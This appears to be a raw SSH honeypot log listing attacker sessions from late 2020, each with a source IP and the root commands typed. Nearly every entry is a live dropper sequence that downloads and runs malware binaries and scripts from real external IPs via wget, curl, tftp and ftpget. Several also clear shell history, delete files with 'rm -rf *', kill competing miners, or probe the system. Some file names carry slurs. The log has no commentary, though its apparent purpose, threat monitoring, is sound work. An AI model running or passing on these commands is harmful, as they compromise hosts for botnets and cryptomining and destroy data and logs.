curl -O http://172.245.205.137/x86_64
chmod 777 *
./x86_64 roots
echo molov13371@tg
nc 1 1

From 193.228.91.108 30-Sep-2020 06:36:29 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86;  tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.109/Otpzl/7rtya.x86
curl -O http://193.228.91.109/Otpzl/7rtya.x86
chmod +x 7rtya.x86
./7rtya.x86 Exploit.x86
rm -rf 7rtya.x86
tftp 193.228.91.109 -c get 7rtya.x86
chmod +x 7rtya.x86
./7rtya.x86 TFTP.Exploit.x86
rm -rf 7rtya.x86
history -c

From 178.157.12.249 30-Sep-2020 09:26:15 ssh2 root
Exec cat /etc/issue ; wget 35.233.20.236/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 35.233.20.236/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
wget 35.233.20.236/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 35.233.20.236/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 5.14.57.253 30-Sep-2020 11:56:07 ssh2 root
uname -a
lscpu
w
crontab -l
ls -a
ls -la
ls
nano reglas.pl
vi reglas.pl
vim
halt

From 45.148.10.65 30-Sep-2020 14:28:09 ssh2 root
Exec nc 1 1;cat /etc/issue;
nc 1 1
cat /etc/issue

From 104.131.110.155 30-Sep-2020 19:47:49 ssh2 root
Exec wget http://107.175.87.103/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 Aws; rm -rf Astra.* ; history -c
wget http://107.175.87.103/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 Aws
rm -rf Astra.*
history -c

From 193.228.91.123 1-Oct-2020 04:27:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/pwnInfect.sh; curl -O http://37.49.224.207/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 37.49.224.207 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 37.49.224.207; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.49.224.207 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.49.224.207/pwnInfect.sh
curl -O http://37.49.224.207/pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp 37.49.224.207 -c get pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp -r pwnInfect2.sh -g 37.49.224.207
chmod 777 pwnInfect2.sh
sh pwnInfect2.sh
ftpget -v -u anonymous -p anonymous -P 21 37.49.224.207 pwnInfect1.sh pwnInfect1.sh
sh pwnInfect1.sh
rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh
rm -rf *

From 37.46.150.211 2-Oct-2020 11:44:00 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://193.239.147.75/Vividbins.sh; chmod 777 Vividbins.sh; sh Vividbins.sh; tftp 193.239.147.75 -c get Vividtftp1.sh; chmod 777 Vividtftp1.sh; sh Vividtftp1.sh; tftp -r Vividtftp2.sh -g 193.239.147.75; chmod 777 Vividtftp2.sh; sh Vividtftp2.sh; rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://193.239.147.75/Vividbins.sh
chmod 777 Vividbins.sh
sh Vividbins.sh
tftp 193.239.147.75 -c get Vividtftp1.sh
chmod 777 Vividtftp1.sh
sh Vividtftp1.sh
tftp -r Vividtftp2.sh -g 193.239.147.75
chmod 777 Vividtftp2.sh
sh Vividtftp2.sh
rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh
rm -rf *

From 45.153.203.104 2-Oct-2020 12:51:21 ssh2 root
Exec nc 1 1; echo lmfao goodbye; cat /etc/issue; pkill xmrig; pkill xmrigMiner; pkill xmrminer; pkill x86; pkill x86_64; pkill storm; pkill a;
nc 1 1
echo lmfao goodbye
cat /etc/issue
pkill xmrig
pkill xmrigMiner
pkill xmrminer
pkill x86
pkill x86_64
pkill storm
pkill a
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 45.153.203.104 2-Oct-2020 12:52:29 ssh2 root
Exec nc 1 1; echo lmfao goodbye; cat /etc/issue; pkill xmrig; pkill xmrigMiner; pkill xmrminer; pkill x86; pkill x86_64; pkill storm; pkill a;
nc 1 1
echo lmfao goodbye
cat /etc/issue
pkill xmrig
pkill xmrigMiner
pkill xmrminer
pkill x86
pkill x86_64
pkill storm
pkill a

From 185.132.53.14 2-Oct-2020 17:36:31 ssh2 root
Exec wget http://192.210.214.51/okami.x86; chmod 777 okami.x86; ./okami.x86 roots; rm -rf okami.x86; history -c
wget http://192.210.214.51/okami.x86
chmod 777 okami.x86
./okami.x86 roots
rm -rf okami.x86
history -c

From 45.148.10.186 3-Oct-2020 00:03:10 ssh2 root
Exec nc 1 1;cat /etc/issue; wget https://nasapaul.com/cnrig; chmod 777 *; ./cnrig; echo lol fuck boy lolololol
nc 1 1
cat /etc/issue
wget https://nasapaul.com/cnrig
chmod 777 *
./cnrig
echo lol fuck boy lolololol

From 34.68.191.164 3-Oct-2020 10:21:52 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 193.239.147.156/sora.x86 ; chmod 777 sora.x86 ; ./sora.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 193.239.147.156/sora.x86 ; chmod 777 sora.x86 ; ./sora.x86 autorooter.x86 ; rm -rf nigga* ; wget 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; wget 193.239.147.156/sora.mips ; chmod 777 sora.mips ; ./sora.mips autorooter.mips ; wget 193.239.147.156/sora.arm ; chmod 777 sora.arm ; ./sora.arm autorooter.arm ; wget 193.239.147.156/sora.arm5 ; chmod 777 sora.arm5 ; ./sora.arm5 autorooter.arm5 ; wget 193.239.147.156/sora.arm6 ; chmod 777 sora.arm6 ; ./sora.arm6 autorooter.arm6 ; wget 193.239.147.156/sora.arm7 ; chmod 777 sora.arm7 ; ./sora.arm7 autorooter.arm7 ; wget 193.239.147.156/sora.mpsl ; chmod 777 sora.mpsl ; ./sora.mpsl autorooter.mpsl
cat /etc/issue
cd /tmp
wget 193.239.147.156/sora.x86
chmod 777 sora.x86
./sora.x86 autorooter.x86 rm -rf nigga*
curl -O wget 193.239.147.156/sora.x86
chmod 777 sora.x86
./sora.x86 autorooter.x86
rm -rf nigga*
wget 193.239.147.156/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 193.239.147.156/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
wget 193.239.147.156/sora.mips
chmod 777 sora.mips
./sora.mips autorooter.mips
wget 193.239.147.156/sora.arm
chmod 777 sora.arm
./sora.arm autorooter.arm
wget 193.239.147.156/sora.arm5
chmod 777 sora.arm5
./sora.arm5 autorooter.arm5
wget 193.239.147.156/sora.arm6
chmod 777 sora.arm6
./sora.arm6 autorooter.arm6
wget 193.239.147.156/sora.arm7
chmod 777 sora.arm7
./sora.arm7 autorooter.arm7
wget 193.239.147.156/sora.mpsl
chmod 777 sora.mpsl
./sora.mpsl autorooter.mpsl

From 185.132.53.14 3-Oct-2020 11:42:22 ssh2 root
Exec wget http://192.210.214.51/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86; history -c
wget http://192.210.214.51/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 roots
rm -rf Astra.x86
history -c

From 104.237.233.111 3-Oct-2020 15:55:28 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://207.182.131.216/cometome; curl -O http://207.182.131.216/cometome; cat cometome > s0531c04t3; chmod +x s0531c04t3; ./s0531c04t3
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://207.182.131.216/cometome
curl -O http://207.182.131.216/cometome
cat cometome > s0531c04t3
chmod +x s0531c04t3
./s0531c04t3

From 46.101.17.38 3-Oct-2020 17:04:53 ssh2 root
Exec wget http://192.210.239.115/beastmode/b3astmode.x86; chmod 777 *; ./b3astmode.x86 x86
wget http://192.210.239.115/beastmode/b3astmode.x86
chmod 777 *
./b3astmode.x86 x86

From 188.166.21.137 3-Oct-2020 17:31:53 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://scan.hellp0pp1n.xyz/xZTYFDBXVSDVS456/HashtagFreeInternet.x86; cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd; chmod +x as0f5wq1dv0sw514qwd; ./as0f5wq1dv0sw514qwd Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://scan.hellp0pp1n.xyz/xZTYFDBXVSDVS456/HashtagFreeInternet.x86
cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd
chmod +x as0f5wq1dv0sw514qwd
./as0f5wq1dv0sw514qwd Rooted.VPS
history -c

From 167.172.25.74 3-Oct-2020 18:12:46 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://194.15.36.34/dayum0x1a5sfd15as1fa.sh; cat dayum0x1a5sfd15as1fa.sh > josdf99exx0; chmod +x josdf99exx0; ./josdf99exx0; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://194.15.36.34/dayum0x1a5sfd15as1fa.sh
cat dayum0x1a5sfd15as1fa.sh > josdf99exx0
chmod +x josdf99exx0
./josdf99exx0
history -c

From 45.148.10.186 4-Oct-2020 04:49:58 ssh2 root
Exec nc 1 1;cd /tmp; wget http://45.148.10.186/lolerr; wget http://199.195.254.38/config.json; curl -O http://45.148.10.186/lolerr; curl -O http://199.195.254.38/config.json; busybox wget http://199.195.254.38/config.json; busybox wget http://45.148.10.186/lolerr; chmod 777 *; ./lolerr; rm -rf *; rm config.json; history -c; pkill xmrig; pkill xmra64; pkill a; echo wedonehereboiz-allwgetz;
nc 1 1
cd /tmp
wget http://45.148.10.186/lolerr
wget http://199.195.254.38/config.json
curl -O http://45.148.10.186/lolerr
curl -O http://199.195.254.38/config.json
busybox wget http://199.195.254.38/config.json
busybox wget http://45.148.10.186/lolerr
chmod 777 *
./lolerr
rm -rf *
rm config.json
history -c
pkill xmrig
pkill xmra64
pkill a
echo wedonehereboiz-allwgetz

From 37.46.150.211 4-Oct-2020 06:55:02 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.129.175.148/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.129.175.148 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.129.175.148; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.129.175.148 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://192.129.175.148/bins.sh
chmod 777 bins.sh
sh bins.sh
tftp 192.129.175.148 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 192.129.175.148
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 192.129.175.148 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 45.84.196.60 4-Oct-2020 12:48:05 ssh2 root
Exec wget http://192.210.214.51/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.* ; history -c
wget http://192.210.214.51/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 roots
rm -rf Astra.*
history -c

From 104.131.60.112 4-Oct-2020 23:59:07 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://67.205.165.251/dayum0x1a5sfd15as1fa.sh; cat dayum0x1a5sfd15as1fa.sh > josdf99exx0; chmod +x josdf99exx0; ./josdf99exx0; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://67.205.165.251/dayum0x1a5sfd15as1fa.sh
cat dayum0x1a5sfd15as1fa.sh > josdf99exx0
chmod +x josdf99exx0
./josdf99exx0
history -c

From 193.228.91.123 5-Oct-2020 04:32:17 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.230.199/pwnInfect.sh; curl -O http://37.49.230.199/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 37.49.230.199 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 37.49.230.199; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.49.230.199 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.49.230.199/pwnInfect.sh
curl -O http://37.49.230.199/pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp 37.49.230.199 -c get pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp -r pwnInfect2.sh -g 37.49.230.199
chmod 777 pwnInfect2.sh
sh pwnInfect2.sh
ftpget -v -u anonymous -p anonymous -P 21 37.49.230.199 pwnInfect1.sh pwnInfect1.sh
sh pwnInfect1.sh
rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh
rm -rf *

From 194.180.224.115 5-Oct-2020 07:32:24 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.230.199/pipe.sh; curl -O http://37.49.230.199/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; rm -rf pipe.sh pipe.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.49.230.199/pipe.sh
curl -O http://37.49.230.199/pipe.sh
chmod 777 pipe.sh
sh pipe.sh
rm -rf pipe.sh pipe.sh
rm -rf *

From 37.46.150.211 5-Oct-2020 08:50:31 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.239.242.200/skid.sh; chmod 777 skid.sh; sh skid.sh; tftp 185.239.242.200 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.239.242.200; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.239.242.200/skid.sh
chmod 777 skid.sh
sh skid.sh
tftp 185.239.242.200 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 185.239.242.200
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 51.116.116.232 5-Oct-2020 17:47:22 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://212.73.150.134/NoHomobins.sh; chmod 777 NoHomobins.sh; sh NoHomobins.sh; tftp 212.73.150.134 -c get NoHomotftp1.sh; chmod 777 NoHomotftp1.sh; sh NoHomotftp1.sh; tftp -r NoHomotftp2.sh -g 212.73.150.134; chmod 777 NoHomotftp2.sh; sh NoHomotftp2.sh; rm -rf NoHomobins.sh NoHomotftp1.sh NoHomotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://212.73.150.134/NoHomobins.sh
chmod 777 NoHomobins.sh
sh NoHomobins.sh
tftp 212.73.150.134 -c get NoHomotftp1.sh
chmod 777 NoHomotftp1.sh
sh NoHomotftp1.sh
tftp -r NoHomotftp2.sh -g 212.73.150.134
chmod 777 NoHomotftp2.sh
sh NoHomotftp2.sh
rm -rf NoHomobins.sh NoHomotftp1.sh NoHomotftp2.sh
rm -rf *

From 193.228.91.11 5-Oct-2020 19:23:21 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/uDvrLib.sh; curl -O http://193.228.91.109/uDvrLib.sh; chmod 777 uDvrLib.sh; sh uDvrLib.sh; tftp 193.228.91.109 -c get v14tftp.sh; chmod 777 v14tftp.sh; sh v14tftp.sh; tftp -r v13tftp.sh -g 193.228.91.109; chmod 777 v13tftp.sh; sh v13tftp.sh; rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.109/uDvrLib.sh
curl -O http://193.228.91.109/uDvrLib.sh
chmod 777 uDvrLib.sh
sh uDvrLib.sh
tftp 193.228.91.109 -c get v14tftp.sh
chmod 777 v14tftp.sh
sh v14tftp.sh
tftp -r v13tftp.sh -g 193.228.91.109
chmod 777 v13tftp.sh
sh v13tftp.sh
rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh
rm -rf *

From 45.148.10.15 5-Oct-2020 23:56:00 ssh2 root
Exec grep 'cpu cores' /proc/cpuinfo | uniq
grep 'cpu cores' /proc/cpuinfo | uniq
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 185.132.53.115 6-Oct-2020 04:46:47 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://23.254.128.159/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 23.254.128.159 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 23.254.128.159; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://23.254.128.159/Thorbins.sh
chmod 777 Thorbins.sh
sh Thorbins.sh
tftp 23.254.128.159 -c get Thortftp1.sh
chmod 777 Thortftp1.sh
sh Thortftp1.sh
tftp -r Thortftp2.sh -g 23.254.128.159
chmod 777 Thortftp2.sh
sh Thortftp2.sh
rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh
rm -rf *

From 34.65.118.201 7-Oct-2020 07:28:41 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.13/sensi.sh; curl -O http://45.145.185.13/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 45.145.185.13 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 45.145.185.13; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.13 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *; wget 45.145.185.13/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 45.145.185.13/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.185.13/sensi.sh
curl -O http://45.145.185.13/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 45.145.185.13 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 45.145.185.13
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.145.185.13 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
wget 45.145.185.13/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 45.145.185.13/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 5.45.82.247 7-Oct-2020 10:15:33 ssh2 root
apt-get update
help

From 58.221.204.114 7-Oct-2020 10:16:47 ssh2 root
ls
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
cd mail
ls
nano lan.doc
help
h
-h
sudo su
cd
cd
ls
test.pl
cd vmware
ls

From 159.203.78.201 7-Oct-2020 10:32:09 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://185.132.53.225/dayum0x1a5sfd15as1fa.sh; cat dayum0x1a5sfd15as1fa.sh > sssoggrf; chmod +x sssoggrf; ./sssoggrf; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://185.132.53.225/dayum0x1a5sfd15as1fa.sh
cat dayum0x1a5sfd15as1fa.sh > sssoggrf
chmod +x sssoggrf
./sssoggrf
history -c

From 45.138.72.100 8-Oct-2020 02:01:01 ssh2 root
Exec ls -la1
ls -la1

From 35.239.98.160 8-Oct-2020 11:33:37 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 45.145.185.13/vcimanagement.x86 ; chmod 777 vcimanagement.x86 ; ./vcimanagement.x86 autorooter.x86 rm -rf vcimanagement* ; curl -O wget 45.145.185.13/vcimanagement.x86 ; chmod 777 vcimanagement.x86 ; ./vcimanagement.x86 autorooter.x86 ; rm -rf vcimanagement* ; wget 45.145.185.13/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 45.145.185.13/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp
wget 45.145.185.13/vcimanagement.x86
chmod 777 vcimanagement.x86
./vcimanagement.x86 autorooter.x86 rm -rf vcimanagement*
curl -O wget 45.145.185.13/vcimanagement.x86
chmod 777 vcimanagement.x86
./vcimanagement.x86 autorooter.x86
rm -rf vcimanagement*
wget 45.145.185.13/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 45.145.185.13/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 193.228.91.123 8-Oct-2020 12:12:06 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.95.168.132/pwnInfect.sh; curl -O http://45.95.168.132/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 45.95.168.132 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 45.95.168.132; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.168.132 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.95.168.132/pwnInfect.sh
curl -O http://45.95.168.132/pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp 45.95.168.132 -c get pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp -r pwnInfect2.sh -g 45.95.168.132
chmod 777 pwnInfect2.sh
sh pwnInfect2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.95.168.132 pwnInfect1.sh pwnInfect1.sh
sh pwnInfect1.sh
rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh
rm -rf *

From 194.180.224.130 8-Oct-2020 12:39:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root  cd /; wget http://45.145.185.94/uDvrLib.sh; curl -O http://45.145.185.94/uDvrLib.sh; chmod 777 uDvrLib.sh; sh uDvrLib.sh; tftp 45.145.185.94 -c get v14tftp.sh; chmod 777 v14tftp.sh; sh v14tftp.sh; tftp -r v13tftp.sh -g 45.145.185.94; chmod 777 v13tftp.sh; sh v13tftp.sh; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.94 v12ftp.sh v12ftp.sh; sh v12ftp.sh; rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh v12ftp.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root cd /
wget http://45.145.185.94/uDvrLib.sh
curl -O http://45.145.185.94/uDvrLib.sh
chmod 777 uDvrLib.sh
sh uDvrLib.sh
tftp 45.145.185.94 -c get v14tftp.sh
chmod 777 v14tftp.sh
sh v14tftp.sh
tftp -r v13tftp.sh -g 45.145.185.94
chmod 777 v13tftp.sh
sh v13tftp.sh
ftpget -v -u anonymous -p anonymous -P 21 45.145.185.94 v12ftp.sh v12ftp.sh
sh v12ftp.sh
rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh v12ftp.sh
rm -rf *

From 185.132.53.14 8-Oct-2020 19:08:52 ssh2 root
Exec wget http://194.87.138.211/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.* ; history -c
wget http://194.87.138.211/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 roots
rm -rf Astra.*
history -c

From 194.180.224.130 9-Oct-2020 11:00:11 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root  cd /; wget http://193.228.91.109/uDvrLib.sh; curl -O http://193.228.91.109/uDvrLib.sh; chmod 777 uDvrLib.sh; sh uDvrLib.sh; tftp 193.228.91.109 -c get v14tftp.sh; chmod 777 v14tftp.sh; sh v14tftp.sh; tftp -r v13tftp.sh -g 193.228.91.109; chmod 777 v13tftp.sh; sh v13tftp.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.109 v12ftp.sh v12ftp.sh; sh v12ftp.sh; rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh v12ftp.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root cd /
wget http://193.228.91.109/uDvrLib.sh
curl -O http://193.228.91.109/uDvrLib.sh
chmod 777 uDvrLib.sh
sh uDvrLib.sh
tftp 193.228.91.109 -c get v14tftp.sh
chmod 777 v14tftp.sh
sh v14tftp.sh
tftp -r v13tftp.sh -g 193.228.91.109
chmod 777 v13tftp.sh
sh v13tftp.sh
ftpget -v -u anonymous -p anonymous -P 21 193.228.91.109 v12ftp.sh v12ftp.sh
sh v12ftp.sh
rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh v12ftp.sh
rm -rf *

From 193.228.91.123 10-Oct-2020 03:28:26 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.115/hentai.sh; curl -O http://194.180.224.115/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp 194.180.224.115 -c get hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp -r hentai2.sh -g 194.180.224.115; chmod 777 hentai2.sh; sh hentai2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.115 hentai1.sh hentai1.sh; sh hentai1.sh; rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.180.224.115/hentai.sh
curl -O http://194.180.224.115/hentai.sh
chmod 777 hentai.sh
sh hentai.sh
tftp 194.180.224.115 -c get hentai.sh
chmod 777 hentai.sh
sh hentai.sh
tftp -r hentai2.sh -g 194.180.224.115
chmod 777 hentai2.sh
sh hentai2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.180.224.115 hentai1.sh hentai1.sh
sh hentai1.sh
rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh
rm -rf *

From 159.89.104.95 10-Oct-2020 12:34:36 ssh2 root
Exec wget http://185.132.53.14/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.* ; history -c
wget http://185.132.53.14/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 roots
rm -rf Astra.*
history -c

From 65.19.174.198 11-Oct-2020 07:06:06 ssh2 root
Exec w ; nproc ; uname -a 
w
nproc
uname -a
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 65.19.174.198 11-Oct-2020 07:07:54 ssh2 root
Exec w ; nproc ; uname -a 
w
nproc
uname -a

From 193.228.91.123 12-Oct-2020 08:24:40 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.115/hentai.sh; curl -O http://194.180.224.115/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; rm -rf hentai.sh hentai.sh ; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.180.224.115/hentai.sh
curl -O http://194.180.224.115/hentai.sh
chmod 777 hentai.sh
sh hentai.sh
rm -rf hentai.sh hentai.sh
rm -rf *

From 5.14.17.52 12-Oct-2020 10:04:49 ssh2 root
w
lscpu
cd /usr/lib
ls -a
cd w
pwd
ls -a
cd /usr/lib/updated
ls -a
dir
ls -a
halt

From 35.238.6.69 12-Oct-2020 15:03:45 ssh2 root
